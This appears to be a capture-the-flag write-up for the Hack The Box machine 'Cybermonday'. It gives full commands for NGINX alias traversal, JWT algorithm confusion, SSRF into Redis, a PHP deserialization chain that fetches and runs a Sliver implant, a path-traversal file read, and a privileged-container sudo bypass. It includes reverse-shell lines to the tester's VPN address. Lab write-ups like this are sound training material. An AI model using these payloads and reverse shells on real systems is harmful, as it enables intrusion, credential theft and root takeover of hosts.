Post

HTB • Cybermonday

Cybermonday is a hard Linux-based Hack the Box machine created by Tr1s0n. We initially found a web server with a common NGINX misconfiguration allowing us to leak the source code. On further review of the PHP source, an access control issue was discovered allowing us to upgrade standard web accounts to admin accounts. From the admin dashboard, we found a reference to an API that was vulnerable to JSON Web Token (JWT) algorithm confusion, allowing us to craft privileged JWTs and access administrative routes. One of these routes was used to write keys on a backend Redis server via SSRF, and cause RCE from PHP session deserialization. From inside a Docker container, we contacted an internal Docker registry to download the image associated with the API, and discovered a path traversal vulnerability which enabled us to recover the password for a host OS user. Now on the host machine, a rule in the Sudo policy allowed for the exploitation of a Python script to start a privilege Docker container. We mounted the host filesystem in this container and recovered the root flag.

Initial Recon

We began by setting up our environment and conducting a port scan using a custom nmap wrapper script. This script aids in quickly and reliably scanning for open ports on the target.

1
2
3
4
5
# Set up environment variables and run a port scan
echo rhost="10.10.11.228" >> ./.ctf # Add machine IP address
echo lhost="10.10.14.2" >> ./.ctf # Add our VPN IP address
. ./.ctf
ctfscan $rhost

The scan reported a total of two open ports:

StateTransportPortProtocolProductVersion
OpenTCP22SSHOpenSSH8.4p1 Debian 5+deb11u1
OpenTCP80HTTPnginx1.25.1

Web

Our initial request to http://10.10.11.228 was answered with a redirect to http://cybermonday.htb. The hostname cybermonday.htb was added to /etc/hosts for easy access from a web browser. We also quickly fingerprinted the web app with Wappalyzer, and found PHP 8.1.20 in use.

1
2
3
4
5
6
7
8
9
10
11
12
# Send GET request to http://10.10.11.228
curl -i "http://$rhost"

# Add hostname "cybermonday.htb" to environment + /etc/hosts
echo "vhost=(cybermonday.htb)" >> ./.ctf && . ./.ctf
echo -e "$rhost\t${vhost[@]}" | sudo tee -a /etc/hosts

# Attempt to fingerprint cybermonday.htb:80
wappalyzer "http://cybermonday.htb" | tee ./logs/wappalyzer-cybermonday_htb.json

# Display versions
jq '.technologies[]|[.name,.version]' ./logs/wappalyzer-cybermonday_htb.json

Application Review

We visited http://cybermonday.htb in BurpSuite’s built-in Chromium browser and began to browse.

Web index cybermonday.htb web index

Both a login and registration page were found, so we registered an account at /signup, and logged in at /login to access additional profile functionality.

Login page cybermonday.htb account login page

User registration page cybermonday.htb account registration page

Off-By-Slash Path Traversal

We noticed that the site pulls static resources from the /assets directory, so we observed the difference between 404 responses when requesting nonexistent paths with and without the prefix /assets to better understand how NGINX is handling those paths.

1
2
3
4
5
# Request nonexistent page WITHOUT "/assets" prefix
curl -I "http://cybermonday.htb/Q2tAab/_" # 404, nginx header + PHP "X-Powered-By"

# Request nonexistent page WITH "/assets" prefix
curl -I "http://cybermonday.htb/assets/_" # 404, only nginx server header

Nonexistent paths without the /assets prefix triggered a response with the X-Powered-By: PHP/8.1.20 header, meaning that they were being processed by PHP. Paths with the prefix did not return the header created by PHP likely because the request was directly communicating with NGINX. This is likely the work of an NGINX alias, which are often misconfigured. We ran some additional checks to look for a common misconfiguration known as NGINX off-by-slash path traversal.

1
2
# Test for NGINX off-by-slash misconfigured alias
curl -I "http://cybermonday.htb/assets.." # HTTP 301 ~> Likely vulnerable

The target appeared to be vulnerable! We began to locate files or directories that might be included at the root of a PHP project, and ended up finding a .git folder, which was used to recover the Git repository with git-dumper. We also downloaded .env, which was listed in .gitignore and therefore excluded from the repository.

1
2
3
4
5
6
7
8
# Check for .git folder
curl -I "http://cybermonday.htb/assets../.git" # HTTP 301 ~> folder exists

# Dump Git repository
git-dumper "http://cybermonday.htb/assets../.git" ./cybermonday.git

# Download .env from project root
curl "http://cybermonday.htb/assets../.env" -so ./cybermonday.git/.env

Before reviewing the actual code, we took a look at .env and found an encryption key presumably used to encrypt, decrypt, or validate sessions. We also learned that the app was using a Redis key-value store at redis:6379 to manage sessions in keys with the laravel_session: prefix.

1
2
3
4
5
6
7
8
9
10
11
12
13
APP_NAME=CyberMonday
APP_ENV=local
APP_KEY=base64:EX3zUxJkzEAY2xM4pbOfYMJus+bjx6V25Wnas+rFMzA=
APP_DEBUG=true
APP_URL=http://cybermonday.htb
...

REDIS_HOST=redis
REDIS_PASSWORD=
REDIS_PORT=6379
REDIS_PREFIX=laravel_session:
CACHE_PREFIX=
...

The source appears to use the default structure of Laravel projects defined in Laravel’s documentation. According to this standard, the core user-defined code should be stored in the app directory.

Broken Access Control

A single user property called isAdmin, referenced in app/Http/Middleware/AuthenticateAdmin.php, dictates whether a session is granted access to administrative routes. After some testing on the endpoints available to standard users, we found that the property could be altered when updating our profile with a JSON request body.

1
2
3
4
5
6
7
8
9
10
11
12
13
POST /home/update HTTP/1.1
Host: cybermonday.htb
Content-Length: 120
Accept: */*
Cookie: XSRF-TOKEN=...; cybermonday_session=...
Content-Type: application/json;charset=UTF-8

{
  "_token":"...",
  "username":"HTB-zVYmCf",
  "email":"zVYmCf@htb.local",
  "isAdmin": true
}

We now have access to the admin dashboard at /dashboard as well as the “Products” and “Changelog” pages referenced on the dashboard.

Admin dashboard Admin dashboard on cybermonday.htb

The changelog in particular includes some interesting information regarding changes made to the application and references a webhook used to create registration logs at http://webhooks-api-beta.cybermonday.htb/webhooks/fda96d32-e8c8-4301-8fb3-c821a316cf77.

Web changelog Administrative changelog on cybermonday.htb

Webhook API

We added the hostname webhooks-api-beta.cybermonday.htb to /etc/hosts to easily access the intended virtual host. An API schema was found at the web index detailing six distinct routes.

1
2
3
4
5
6
# Add virtual hostname to /etc/hosts
echo -e "$rhost\twebhooks-api-beta.cybermonday.htb" | sudo tee -a /etc/hosts
echo 'webhooks_api=http://webhooks-api-beta.cybermonday.htb' >> ./.ctf && . ./.ctf

# Download webhook API routes
curl -s http://webhooks-api-beta.cybermonday.htb/ | jq .message.routes > ./routes.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
{
  "/auth/register": {
    "method": "POST",
    "params": ["username", "password"]
  },
  "/auth/login": {
    "method": "POST",
    "params": ["username", "password"]
  },
  "/webhooks": {
    "method": "GET"
  },
  "/webhooks/create": {
    "method": "POST",
    "params": ["name", "description", "action"]
  },
  "/webhooks/delete:uuid": {
    "method": "DELETE"
  },
  "/webhooks/:uuid": {
    "method": "POST",
    "actions": {
      "sendRequest": {
        "params": ["url", "method"]
      },
      "createLogFile": {
        "params": ["log_name", "log_content"]
      }
    }
  }
}

The sendRequest action looked like it could easily lead to SSRF, so we tried using /webhooks/create to create a new webhook with sendRequest and found that we needed to authenticate. We proceeded to create an account at /auth/register and authenticate at /auth/login.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# Try accessing the webhook from changelog
curl -i -XPOST "$webhooks_api/webhooks/fda96d32-e8c8-4301-8fb3-c821a316cf77" # missing key

# Try to create a new webhook with sendRequest
curl -i $webhooks_api/webhooks/create \
  -H 'Content-Type: application/json' \
  -d '{"name":"KmCu","description":"d0Ik","action":"sendRequest"}' # "Unauthorized"

# Register an account + login
username='HTB-IrLGdg'
password='hIC8CZNMjr2VuQV0Al'
curl $webhooks_api/auth/register \
  -H 'Content-Type: application/json' \
  -d '{"username":"'"$username"'","password":"'"$password"'"}' # "success"
curl $webhooks_api/auth/login \
  -H 'Content-Type: application/json' \
  -d '{"username":"'"$username"'","password":"'"$password"'"}' # Got access token
1
{"status":"success","message":{"x-access-token":"eyJ0..."}}

A JSON Web Token (JWT) was returned in the x-access-token field, likely referring to the header it should be supplied in. With this JWT, we gained access to the /webhooks route, but did not find any new webhooks listed. We also found that /webhooks/create was still off-limits.

1
2
3
4
5
6
7
8
# List webhooks
token="..." # Token from the successful login response
curl $webhooks_api/webhooks -H "x-access-token: $token" # No new webhooks :(

# Try to create a new webhook with sendRequest (authenticated)
curl -i $webhooks_api/webhooks/create \
  -H 'Content-Type: application/json' -H "x-access-token: $token" \
  -d '{"name":"KmCu","description":"d0Ik","action":"sendRequest"}' # still "Unauthorized"

JSON Web Tokens

We sent an authenticated request through our local BurpSuite proxy, copied it to Repeater, and began looking for security holes in the JWT implementation using BurpSuite’s JWT Editor extension.

1
2
3
# Send request through local BurpSuite proxy
burp_proxy="http://127.0.0.1:8080"
curl -sx $burp_proxy "$webhooks_api/webhooks" -H "x-access-token: $token"

Webhooks API request in BurpSuite Repeater Authenticated API request in BurpSuite Repeater

Webhooks API request in BurpSuite JWT Editor Authenticated API request with JWT Editor view

The JWT was signed using the RS256 algorithm (RSA) as defined in the alg field. There’s a common vulnerability found in JWT processing mechanisms using RSA called algorithm confusion. We needed the RSA public key to test for this, so we quickly retrieved it from a common location /jwks.json.

1
2
3
4
5
# Download JSON Web Keys (JWKs)
curl "$webhooks_api/jwks.json" -O

# Print key with "kid" (required by JWT Editor)
jq '.keys[0]|.kid="pwn"' ./jwks.json
1
2
3
4
5
6
7
8
{
  "kty": "RSA",
  "use": "sig",
  "alg": "RS256",
  "n": "pvezvAKCOgxwsiyV6PRJfGMul-WBYorwFIWudWKkGejMx3onUSlM8OA3PjmhFNCP_8jJ7WA2gDa8oP3N2J8zFyadnrt2Xe59FdcLXTPxbbfFC0aTGkDIOPZYJ8kR0cly0fiZiZbg4VLswYsh3Sn797IlIYr6Wqfc6ZPn1nsEhOrwO-qSD4Q24FVYeUxsn7pJ0oOWHPD-qtC5q3BR2M_SxBrxXh9vqcNBB3ZRRA0H0FDdV6Lp_8wJY7RB8eMREgSe48r3k7GlEcCLwbsyCyhngysgHsq6yJYM82BL7V8Qln42yij1BM7fCu19M1EZwR5eJ2Hg31ZsK5uShbITbRh16w",
  "e": "AQAB",
  "kid": "pwn"
}

We opened up the Keys tab under JWT Editor, selected “New RSA Key” and added the JWK object.

JWT Editor - RSA Key Import signing key from JWK

From here we navigated back to the Repeater tab, selected the JSON Web Token view, and edited the payload’s role key to “admin”. We clicked Attack ➤ HMAC Key Confusion and used the imported key and HS256 algorithm when prompted to select a signing key and algorithm.

JWT Editor - modified JWT Modified JWT in the “JWT Editor” view JWT Editor - HMAC key confusion Conduct HMAC key confusion attack

We sent the request with the new JWT to /webhooks and found that our edited JWT is valid! This means that the privileged JWT was accepted by the server.

Webhooks API request with edited JWT Response indicating a valid JWT

Finally, we could create a new webhook at /webhooks/create using the privileged token. We created a webhook that implements sendRequest, and got a new UUID to access it.

Create webhook with privileged JWT Create a new webhook to use “sendRequest”

Server Side Request Forgery (SSRF)

We began testing the new webhook for SSRF and noticed that it sends requests to any URL using the HTTP wrapper, and the method parameter accepts any string value, even with whitespace.

1
2
3
4
5
6
7
# Start listener
socat TCP-LISTEN:8080,fork,reuseaddr,bind=$lhost -

# (In a separate tab) trigger SSRF
uuid="e7538116-6c9b-4af4-8cd0-e7410dd4b843" # The sendRequest webhook
curl $webhooks_api/webhooks/$uuid -H 'Content-Type: application/json' \
  -d '{"url":"http://'"$lhost"':8080","method":"DEMO\r\nX:"}' -so /dev/null
1
2
3
4
DEMO
X: / HTTP/1.1
Host: 10.10.14.2:8080
Accept: */*

We used this SSRF to contact the Redis store from the Laravel environment at redis:6379. To verify the blind interaction, our Laravel session on the main site was set to a blank string, then we confirmed that we were no longer authenticated. To recover the laravel session ID, we simply decrypted the session information from the “cybermonday_session” cookie, using the key we found earlier in cybermonday.git/.env

Decoded session object Decode the “cybermonday_session” cookie with BurpSuite Inspector

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
# "iv" from cybermonday_session object
iv=$(echo "4ahET1XMUo4K13E5bm6NIw=="|base64 -d|xxd -p -c16)

# Key from .env
key=$(echo "EX3zUxJkzEAY2xM4pbOfYMJus+bjx6V25Wnas+rFMzA="|base64 -d|xxd -p -c32)

# "value" from decoded cybermonday_session cookie
cat << EOF | base64 -d > data.bin
Yyj5xpbX/anzgYqAsiDMwXm6HXflROxg
LyYvuA2oRtfjJJ/d+nR4Sx2/3Cziyb9m
YUsv7CdHhqUfs/l9OxmSTxd10Hp1GHNa
Re2WyYcNYkGuVgQb1FfaCxwPTupVAttL
EOF

# Decrypt the session information
session_info=$(openssl enc -d -aes-256-cbc -K $key -iv $iv -in ./data.bin)

# Session ID should be the second value
session_id=$(echo $session_info | cut -d\| -f2)

# Get redis key using REDIS_PREFIX from .env
REDIS_PREFIX="laravel_session:"
redis_key="${REDIS_PREFIX}${session_id}"
echo $redis_key

# Write to our session
curl -so /dev/null "$webhooks_api/webhooks/$uuid" -H 'Content-Type: application/json' \
  -d '{"url":"http://redis:6379","method":"MSET '"$redis_key ''"'\r\n"}'
1
laravel_session:LkqHznYDBJZT4DWvZOx7JWCHF6IdKdy8i1tYl8Fs

Now if we request /home again with the matching session cookie, we should be redirected to the login page since our session is no longer valid.

Verifying communication with redis server Check if session is still valid

Deserialization

Since we could control the serialized session data through SSRF to redis, we decided to try some PHP deserialization gadget chains created by phpggc. we initially looked for Laravel RCE chains but could not find any matching the laravel version in use. Eventually we noticed that Monolog was being used as the logging driver for Laravel as defined in config/loggin.php, and it had plenty of compatible gadgets chains.

1
2
3
4
5
# Laravel gadgets are mostly incompatible :/
phpggc -l "Laravel"

# Many Monolog gadgets are supported through 2.x
phpggc -l "Monolog"
1
2
3
4
5
6
7
8
9
10
11
12
13
14
Gadget Chains
-------------

NAME            VERSION                            TYPE            VECTOR        I    
Monolog/FW1     3.0.0 <= 3.1.0+                    File write      __destruct    *    
Monolog/RCE1    1.4.1 <= 1.6.0 1.17.2 <= 2.7.0+    RCE: Command    __destruct         
Monolog/RCE2    1.4.1 <= 2.7.0+                    RCE: Command    __destruct         
Monolog/RCE3    1.1.0 <= 1.10.0                    RCE: Command    __destruct         
Monolog/RCE4    ? <= 2.4.4+                        RCE: Command    __destruct    *    
Monolog/RCE5    1.25 <= 2.7.0+                     RCE: Command    __destruct         
Monolog/RCE6    1.10.0 <= 2.7.0+                   RCE: Command    __destruct         
Monolog/RCE7    1.10.0 <= 2.7.0+                   RCE: Command    __destruct    *    
Monolog/RCE8    3.0.0 <= 3.1.0+                    RCE: Command    __destruct    *    
Monolog/RCE9    3.0.0 <= 3.1.0+                    RCE: Command    __destruct    *

We started with Monolog/RCE1 because Monolog 2 appeared to be supported. We created a gadget chain to trigger a call to system with the command sleep 5 to cause a five second response delay for detection purposes.

1
2
3
4
5
6
7
8
9
# use -a/--ascii-strings to escape unprintable bytes
serial=$(phpggc "Monolog/RCE1" "system" "sleep 5" -a)

# Create valid JSON request body
data=$(echo {} | jq --arg k "$redis_key" --arg v "$serial" \
  '.url="http://redis:6379"|.method="'"MSET \"+\$k+\" '\"+\$v+\"'\"")

# Write session to redis via SSRF
curl $webhooks_api/webhooks/$uuid -H 'Content-Type: application/json' -d "$data"

We once again requested /home under the corresponding session and noticed a response time of just over five seconds. This was a solid indication that our command was executed, so we created another payload to download and execute a Sliver implant.

1
2
3
4
5
6
7
8
# Generate payload that will fetch a stager script
stage="https://$lhost/TdsJnG"
serial=$(phpggc "Monolog/RCE1" "system" "curl -k $stage|sh" -a)
data=$(echo {} | jq --arg k "$redis_key" --arg v "$serial" \
  '.url="http://redis:6379"|.method="'"MSET \"+\$k+\" '\"+\$v+\"'\"")

# Write to session once again
curl $webhooks_api/webhooks/$uuid -H 'Content-Type: application/json' -d "$data"

Before we triggered deserialization again we created a stage script, generated an implant, started an HTTPS listener to host the both files, and initialized the mTLS Command & Control channel.

1
2
3
4
5
cat << EOF > stage.sh
of=\$(mktemp /tmp/Nu5I4j.XXXXXX)
curl -k https://$lhost/BuhPQk -o \$of
sh -c "chmod +x \$of;\$of &"
EOF
1
2
3
4
5
mtls -L 10.10.14.2 -l 8443
generate -o linux -m 10.10.14.2:8443 -l -G -s implant.elf
websites add-content -w cybermonday -c implant.elf -p /BuhPQk
websites add-content -w cybermonday -c stage.sh -p /TdsJnG
https -L 10.10.14.2 -l 443 -w cybermonday

After repeating the request to trigger deserialization, we successfully establish an implant Session!

Implant session established Established Sliver implant as www-data

Docker

Judging by the hostname and presence of /.dockerenv, we were confident that our implant session was in a Docker container. We found a Linux user named john in /mnt/.ssh/authorized_keys, but couldn’t find much else on the filesystem, so we began mapping the Docker network.

1
2
ifconfig
socks5 start -P 1080
1
2
# Scan the 1000 most common TCP ports on 172.18.0.0/29
naabu -proxy localhost:1080 -timeout 1000 -host 172.18.0.0/29
1
2
3
4
5
6
172.18.0.7:80
172.18.0.3:3306
172.18.0.1:80
172.18.0.1:22
172.18.0.2:5000
172.18.0.4:80

Port 5000 on 172.18.0.2 looked interesting, so we forwarded it to localhost and began testing. A plain HTTP GET request verified that it was a HTTP server, but didn’t return much else. We tried requesting a random path and found that this was a Docker registry from the Docker-Distribution-Api-Version header.

1
portfwd add -r 172.18.0.2:5000 -b 127.0.0.1:5000
1
2
3
# Investigate 172.18.0.2:5000 through local port forward
curl -i localhost:5000 # Nothing interesting
curl -i localhost:5000/_ # "registry/2.0" ~> Docker registry

Docker Registry

The /v2/_catalog endpoint was requested to list container images. We ended up finding a custom image called cybermonday_api which was likely tied to the webhook API. The filesystem layers were downloaded from the registry and searched for relevant content.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
# List images
curl -i http://localhost:5000/v2/_catalog

# Download manifest for cybermonday_api:latest
curl http://localhost:5000/v2/cybermonday_api/manifests/latest | tee latest.manifest

# Dump filesystem layers
mkdir blobs
for blob in $(jq -r ".fsLayers[].blobSum" ./latest.manifest | awk '!x[$0]++'); do
  curl "http://localhost:5000/v2/cybermonday_api/blobs/$blob" -o blobs/$blob.tgz
done

# Search through filesystem layers for relevant files
for f in $(ls blobs); do
  tar -tzf blobs/$f | egrep -i var/www >/dev/null | sed "s/^/$f /"
done | grep "app/"

A bunch of custom PHP application sources were found at /var/www/html/app in blobs/sha256:ced3ae14*.tgz. We began to look for important secrets or exploitable bugs within the API source.

1
2
3
4
# Extract specific filesystem layer to new directory
mkdir ./cybermonday_api && cd ./cybermonday_api
tar -xzf ../blobs/sha256:ced3ae14*.tgz
cd ./var/www/html

API Code Review

We found out that config.php gathers a few important variables from the environment including some database credentials that would be of interest to us.

1
2
3
4
5
6
return [
    "dbhost" => getenv('DBHOST'),
    "dbname" => getenv('DBNAME'),
    "dbuser" => getenv('DBUSER'),
    "dbpass" => getenv('DBPASS')
];

We also found that app/routes/Router.php maps a previously unknown route, POST /webhooks/:uuid/logs, to the LogsController class. We took a look at app/controllers/LogsController.php since this was new content.

Local File Read

The LogsController class was affected by a bug allowing us to read local files. The “read” action appeared to look for ../ sequences THEN removed spaces. Because of this, we could simply position a space between two characters to bypass that rule.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$logPath = "/logs/{$webhook_find->name}/";

switch($this->data->action) {
  // ...
  case "read":
    $logName = $this->data->log_name;

    if(preg_match("/\.\.\//", $logName)) {
      return $this->response(["status" => "error", "message" => "This log does not exist"]);
    }
    $logName = str_replace(' ', '', $logName);

    if(stripos($logName, "log") === false) {
      return $this->response(["status" => "error", "message" => "This log does not exist"]);
    }
    if(!file_exists($logPath.$logName)) {
      return $this->response(["status" => "error", "message" => "This log does not exist"]);
    }
    $logContent = file_get_contents($logPath.$logName);
    return $this->response(["status" => "success", "message" => $logContent]);
}

To reach this functionality, an API key in the X-Api-Key header must be provided as specified in app/helpers/Api.php. To pass the stripos call, the payload must contain the string “log” in the name of an existing directory. Finally, to pass the file_exists check, there should be at least one log stored by the webhook since /logs/{UUID}/ is created after the first log. We created a shell function to simplify the reading of files.

1
2
3
4
5
6
7
8
9
public function apiKeyAuth()
{
  $this->api_key = "22892e36-1770-11ee-be56-0242ac120002";

  if(!isset($_SERVER["HTTP_X_API_KEY"]) || empty($_SERVER["HTTP_X_API_KEY"]) || $_SERVER["HTTP_X_API_KEY"] != $this->api_key)
  {
    return $this->response(["status" => "error", "message" => "Unauthorized"], 403);
  }
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
uuid="fda96d32-e8c8-4301-8fb3-c821a316cf77"
api_key="22892e36-1770-11ee-be56-0242ac120002"

# write a log to create $logPath directory
curl "$webhooks_api/webhooks/$uuid" -H "Content-Type: application/json" \
  -d '{"log_name":"x","log_content":"..."}'

# Shell function to read files 
cybermonday_api_read_file() {
  curl -s "$webhooks_api/webhooks/$uuid/logs" \
    -H "X-Api-Key: $api_key" -H "Content-Type: application/json" \
    -d '{"action":"read","log_name":". ./. ./logs/. ./'"${1}"'"}' |
      jq -r '.message'
}

# Test out the function
cybermonday_api_read_file "/etc/passwd"
# Read database connection variables from environment
cybermonday_api_read_file "/proc/self/environ" | tr \\0 \\n | sort -u
1
2
3
4
DBHOST=db
DBNAME=webhooks_api
DBPASS=ngFfX2L71Nu
DBUSER=dbuser

We successfully read the database connection information referenced in config.php from the process environment variables at /proc/self/environ. A shell was established on the host machine via SSH with the database password and the username “john”, which was found earlier in /mnt/.ssh/authorized_keys on the implant session.

1
2
# Connect via SSH
ssh john@$rhost # use DBPASS value

Privilege Escalation

Now logged in as john, We noticed a special sudo exception to run a Python script at /opt/secure_compose.py as root with arguments matching *.yml.

1
2
# List sudo security policy
sudo -l
1
2
User john may run the following commands on localhost:
    (root) /opt/secure_compose.py *.yml

Docker Compose

The Python script at /opt/secure_compose.py allowed us to start Docker containers using the command-line docker-compose utility, and implemented some checks for security purposes. One of these checks, is_path_inside_whitelist, should deny volumes outside of /home/john or /mnt. Another check, check_no_symlinks, should prevent the use of symbolic links to access files outside of those permitted folders.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
import sys, yaml, os, random, string, shutil, subprocess, signal

def get_user():
    return os.environ.get("SUDO_USER")

def is_path_inside_whitelist(path):
    whitelist = [f"/home/{get_user()}", "/mnt"]

    for allowed_path in whitelist:
        if os.path.abspath(path).startswith(os.path.abspath(allowed_path)):
            return True
    return False

def check_whitelist(volumes):
    for volume in volumes:
        parts = volume.split(":")
        if len(parts) == 3 and not is_path_inside_whitelist(parts[0]):
            return False
    return True

def check_read_only(volumes):
    for volume in volumes:
        if not volume.endswith(":ro"):
            return False
    return True

def check_no_symlinks(volumes):
    for volume in volumes:
        parts = volume.split(":")
        path = parts[0]
        if os.path.islink(path):
            return False
    return True

def check_no_privileged(services):
    for service, config in services.items():
        if "privileged" in config and config["privileged"] is True:
            return False
    return True

Privileged Container Bypass

The check_no_privileged check was bypassed using a special YAML value Y, which is interpreted as true by Docker’s YAML parser while PyYAML interprets it as the string “Y”. We created a YAML file that would start a privileged Docker container with the cybermonday_api image, then call a reverse shell from inside.

1
2
3
4
5
6
7
# Privileged Container Bypass
version: "3.0"
services:
  privileged-bypass:
    image: "cybermonday_api" # We know that this one exists from earlier
    privileged: Y # PyYAML -> "Y"; Docker -> true
    command: ["bash","-c","bash -i>&/dev/tcp/10.10.14.2/8888<&1"] # 10.10.14.2 is our VPN address
1
2
3
4
5
# Upload our YAML exploit
scp ./privileged-bypass.yml john@$rhost:/tmp/privileged-bypass-OsE7Cu.yml

# Setup reverse shell listener
pwncat-cs -l $lhost 8888 # install PwnCat: `pip3 install pwncat-cs`

The device that stores the root filesystem was located at /dev/sda1 with the findmnt utility. We finally started the privileged container using the custom sudo policy, which triggered the reverse shell callback.

1
2
3
4
5
# List mounts in tree format
findmnt # ~> /dev/sda1 is the root filesystem partition

# Trigger reverse shell from privileged container
sudo /opt/secure_compose.py /tmp/privileged-bypass-OsE7Cu.yml

From the reverse shell session, we mounted the host filesystem at /mnt to gain full access. We then used chroot to switch to the mounted host filesystem, and finally read the root flag.

1
2
3
4
5
6
# Mount the host filesystem
mount /dev/sda1 /mnt

# Access the host filesystem + read the root flag
chroot /mnt bash
cat /root/root.txt

Restricted Volumes Bypass (Bonus)

The check_no_symlinks check could also be bypassed using a path beyond a symbolic link. For example, to read a protected directory like /root we created a link from / to /home/john/fs, then accessed /root by adding /home/john/fs/root as a volume.

1
2
3
4
5
6
7
# Restricted Volumes Bypass
version: "3"
services:
  volumes-bypass:
    image: "cybermonday_api"
    volumes: ["/home/john/fs/root:/mnt/root:ro"]
    command: ["bash","-c","bash -i>&/dev/tcp/10.10.14.2/8888<&1"]
1
2
ln -s / /home/john/fs
sudo /opt/secure_compose.py ./volumes-bypass.yml

After catching the reverse shell, the root flag was once again read from /mnt/root/root.txt.

This post is licensed under CC BY 4.0 by the author.